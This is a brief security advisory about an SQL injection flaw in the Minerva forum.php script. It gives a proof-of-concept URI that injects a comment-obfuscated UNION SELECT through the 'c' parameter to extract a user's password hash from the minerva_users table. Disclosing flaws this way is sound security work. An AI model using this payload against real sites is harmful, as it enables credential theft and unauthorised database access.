Minerva Forum.PHP SQL Injection Vulnerability

Minerva Forum.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*